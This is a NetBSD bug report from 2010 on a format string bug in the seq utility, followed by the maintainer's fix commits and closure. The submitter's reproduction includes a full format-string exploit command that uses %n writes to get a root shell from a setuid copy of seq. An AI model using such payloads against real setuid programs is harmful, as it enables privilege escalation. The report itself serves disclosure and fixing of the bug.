NetBSD Problem Report #43355
From www@NetBSD.org Tue May 25 19:22:53 2010
Return-Path: <www@NetBSD.org>
Received: from mail.netbsd.org (mail.netbsd.org [204.152.190.11])
by www.NetBSD.org (Postfix) with ESMTP id 64B4D63B879
for <gnats-bugs@gnats.NetBSD.org>; Tue, 25 May 2010 19:22:53 +0000 (UTC)
Message-Id: <20100525192252.A871D63B873@www.NetBSD.org>
Date: Tue, 25 May 2010 19:22:52 +0000 (UTC)
From: chomzee@ethernet.pl
Reply-To: chomzee@ethernet.pl
To: gnats-bugs@NetBSD.org
Subject: Format string attack in seq program
X-Send-Pr-Version: www-1.0
>Number: 43355
>Category: bin
>Synopsis: Format string attack in seq program
>Confidential: no
>Severity: non-critical
>Priority: low
>Responsible: bin-bug-people
>State: closed
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Tue May 25 19:25:00 +0000 2010
>Closed-Date: Thu May 27 08:46:29 +0000 2010
>Last-Modified: Thu May 27 19:05:08 +0000 2010
>Originator: Bartosz Chodorowski
>Release: none
>Organization:
-
>Environment:
Linux aleurwal 2.6.26-2-686 #1 SMP Tue Mar 9 17:35:51 UTC 2010 i686 GNU/Linux
>Description:
seq program compiled under Linux environment is vulnerable to format string attack. Problem does not occur in *BSD systems, because of distinct c library implementation (printf function).
>How-To-Repeat:
chomzee@aleurwal:~/vulns$ ./seq -f %..%n 1 1
Segmentation fault
With randomized stack address space this vulnerability may be used to execute arbitrary code:
chomzee@aleurwal:~/vulns$ ls -l seq
-rwsr-sr-x 1 root root 12349 2010-05-25 16:39 seq
chomzee@aleurwal:~/vulns$ ./seq -f `printf "\xbc\xef\xff\xbf"`____`printf "\xbd\xef\xff\xbf"`____`printf "\xbe\xef\xff\xbf"`____`printf "\xbf\xef\xff\xbf"`xxxx`perl -e 'print "%..%08x"x145'`%..%0193x%..%08n%..%060x%..%08n%..%0254x%..%08n%..%0184x%..%08n `perl -e 'print "0"x993'`1 1
#
# long program output
#
bash-3.2# whoami
root
bash-3.2#
>Fix:
Modify seq.c so that it won't allow strings like '%..%n' to get into format.
>Release-Note:
>Audit-Trail:
Responsible-Changed-From-To: security-officer->bin-bug-people
Responsible-Changed-By: dholland@NetBSD.org
Responsible-Changed-When: Thu, 27 May 2010 08:04:41 +0000
Responsible-Changed-Why:
The only security problem here is that the submitter chmod +s'd his binary...
State-Changed-From-To: open->analyzed
State-Changed-By: dholland@NetBSD.org
State-Changed-When: Thu, 27 May 2010 08:04:41 +0000
State-Changed-Why:
The problem is that valid_format() is too permissive and allows some
invalid format strings through.
From: "David A. Holland" <dholland@netbsd.org>
To: gnats-bugs@gnats.NetBSD.org
Cc:
Subject: PR/43355 CVS commit: src/usr.bin/seq
Date: Thu, 27 May 2010 08:30:35 +0000
Module Name: src
Committed By: dholland
Date: Thu May 27 08:30:35 UTC 2010
Modified Files:
src/usr.bin/seq: seq.1 seq.c
Log Message:
Fix valid_format() to be more careful about allowing only valid printf
formats.
Also, accept %a and %A, which are new since this logic was last updated,
and also allow %F even though it's not functionally different from %f.
Document these additions and bump date of man page.
Fixes PR 43355.
To generate a diff of this commit:
cvs rdiff -u -r1.6 -r1.7 src/usr.bin/seq/seq.1
cvs rdiff -u -r1.5 -r1.6 src/usr.bin/seq/seq.c
Please note that diffs are not public domain; they are subject to the
copyright notices on the relevant files.
From: "David A. Holland" <dholland@netbsd.org>
To: gnats-bugs@gnats.NetBSD.org
Cc:
Subject: PR/43355 CVS commit: src/usr.bin/seq
Date: Thu, 27 May 2010 08:40:20 +0000
Module Name: src
Committed By: dholland
Date: Thu May 27 08:40:20 UTC 2010
Modified Files:
src/usr.bin/seq: seq.c
Log Message:
Rerun valid_format() both before and after unescaping the format
string, in case the format string contains printf conversions
assembled from escape sequences.
A better approach might be to adjust the unescape logic to avoid
generating printf conversions (e.g. convert \x25 to %% instead of %)
but that's somewhat problematic and it's not really worth taking the
trouble.
Running valid_format() only after unescaping would also be somewhat
tidier but makes printing the invalid format string problematic,
because the unescape logic runs in place.
None of these cases are really worth worrying about in detail, but now
at least they don't result in SIGSEGV.
Related to PR 43355.
To generate a diff of this commit:
cvs rdiff -u -r1.6 -r1.7 src/usr.bin/seq/seq.c
Please note that diffs are not public domain; they are subject to the
copyright notices on the relevant files.
State-Changed-From-To: analyzed->closed
State-Changed-By: dholland@NetBSD.org
State-Changed-When: Thu, 27 May 2010 08:46:29 +0000
State-Changed-Why:
Fixed.
Thanks for bringing this to our attention, but please don't raise false
security alarms; it does not get bugs fixed faster and ultimately only
serves to damage your own credibility.
From: Bartosz Chodorowski <chomzee@ethernet.pl>
To: gnats-bugs@NetBSD.org
Cc:
Subject: Re: bin/43355 (Format string attack in seq program)
Date: Thu, 27 May 2010 19:25:46 +0200
Dnia 2010-05-27 you wrote:
> State-Changed-From-To: analyzed->closed
> State-Changed-By: dholland@NetBSD.org
> State-Changed-When: Thu, 27 May 2010 08:46:29 +0000
> State-Changed-Why:
> Fixed.
>
> Thanks for bringing this to our attention, but please don't raise false
> security alarms; it does not get bugs fixed faster and ultimately only
> serves to damage your own credibility.
Okay, next time I will try to match category more carefully.
Best regards,
--
Bartosz 'chomzee' Chodorowski
>Unformatted:
(Contact us)
$NetBSD: query-full-pr,v 1.39 2013/11/01 18:47:49 spz Exp $
$NetBSD: gnats_config.sh,v 1.8 2006/05/07 09:23:38 tsutsui Exp $
Copyright © 1994-2007
The NetBSD Foundation, Inc. ALL RIGHTS RESERVED.
Home